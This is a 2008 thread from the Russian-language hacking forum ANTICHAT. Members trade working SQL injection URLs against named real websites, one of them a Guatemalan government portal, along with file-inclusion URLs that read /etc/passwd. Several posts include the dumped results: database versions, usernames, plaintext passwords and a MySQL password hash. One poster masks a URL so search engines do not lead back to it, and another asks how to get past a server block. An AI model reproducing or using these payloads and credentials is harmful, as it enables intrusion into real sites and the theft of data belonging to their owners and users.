ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.01.2008, 11:59
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
sql inj
http://teh-nn.ru/news.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,login,passwo rd),6+from+users
http://www.loran-eko.ru/news.php?id=-3+UNION+SELECT+1,concat(login,0x3a,pass),3,4,5+fro m+users
http://www.dhmr.ru/news.php?id=-3+union+select+1,2,3,4,version(),6+users
php inc
http://www.wearetheclips.com/main.php?p=../../../../../etc/passwd
http://www.prescription.fr/index.php?p=../../../../etc/passwd
|
|
|
30.01.2008, 12:31
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
b3, что-то мне подсказывает, что для пхп-инжей тут есть отдельная тема)
|
|
|
|
30.01.2008, 15:20
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454
Репутация:
142
|
|
http://www.allaboutjazz.com/php/news.php?id=-13551+union+select+1,2,concat(version(),0x3a,user( ),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42/*
4.1.20:vxweb@jazzy:allaboutjazz
 а таблички не подобрал, есть мемберка
порыскайте кому не лень
|
|
|
|
30.01.2008, 16:18
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454
Репутация:
142
|
|
 саксесс
http://e*s*h*o*p.w*h*t*t.org/e*s*h*o*p.php?id=-24+union+select+1,concat(email,0x3a,password),3,4, 5,6,7,8,9,10+from+members/*
http://e*s*h*o*p.w*h*t*t.org/order.php
пхпмайадмин имеет стандартный урл, но пас и логин я не нашел ((( и админку не нашел, если кто узнает скрипт - ставьте на локалку, там и таблички с колонками найдете и пути, и всё ваше будет. Так как я таблички и колонки на угад писал 
уберите звёздочки и не цитируйте плз урл, так как потом удалю может
Последний раз редактировалось bobob; 30.01.2008 в 16:24..
|
|
|
|
30.01.2008, 22:58
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
звиняйте за оффтоп - bobob зачем звёзды в урле ?
|
|
|
|
30.01.2008, 23:17
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454
Репутация:
142
|
|
ну шоп, чтоб потом сюда не пришли по гуглу
|
|
|
|
30.01.2008, 23:34
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
oferta9.ro
Код HTML:
http://www.oferta9.ro/magazin.php?m=-661+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9/*
USER:mn76_iuser@localhost
VERSION:4.1.22-standard
DATABASE:mn76_piata9
disenoemergente.cl
Код HTML:
http://www.disenoemergente.cl/index_noticia.php?noticia=-177+union+select+0,1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4,5,6,7,8,9,10/*
USER:diseno@localhost
VERSION:5.0.32-Debian_7etch4-log
DATABaSE:diseno
guatemala.gob.gt
Код HTML:
http://www.guatemala.gob.gt/noticias.php?mes=1&anyo=2006&dia=14&tipo=1+union+select+0,1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),3,4,5,6,7,8,9,10,11,12/*
USER:root@localhost
VERSION:4.1.7
DATABASE:presidencia
|
|
|
|
30.01.2008, 23:43
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
http://rs.karacitours-bg.info/
Код HTML:
http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database())/*
5.0.32-Debian_7etch1-log:root@localhost:cs
Код HTML:
http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,id,username,pwd)+FROM+alfauser+LIMIT+1,1/*
1:karaci:karaci123
2:rual:rual123
3:desi_karaci:desi001
...
Код HTML:
http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user,password)+FROM+mysql.user/*
debian-sys-maint:*D9B5ECA68500BC0D046CB07B2CC6F224E4470FE3
|
|
|
|
31.01.2008, 13:58
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Австралийский сайтец
Код:
http://www.mgnsw.org.au/museums_and_galleries.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
4.1.20:mgnsw@localhost:mgnsw |
|
|
|
31.01.2008, 15:10
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
Вот такой интересный скуль
Код:
http://www.ipecac.com/bio.php?id=44'
подобрал количество столбцов через order by т.е
вот такой код вызывает ошибку
Код:
http://www.ipecac.com/bio.php?id=44+order+by+5/*
вот такой нет
Код:
http://www.ipecac.com/bio.php?id=44+order+by+4*
следовательно должно рабоать
Код:
http://http://www.ipecac.com/bio.php?id=44/**/union/**/select/**/1,2,3,4/*
но почему то кричит:You don't have permission to access /bio.php on this server.
в чем проблема ? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
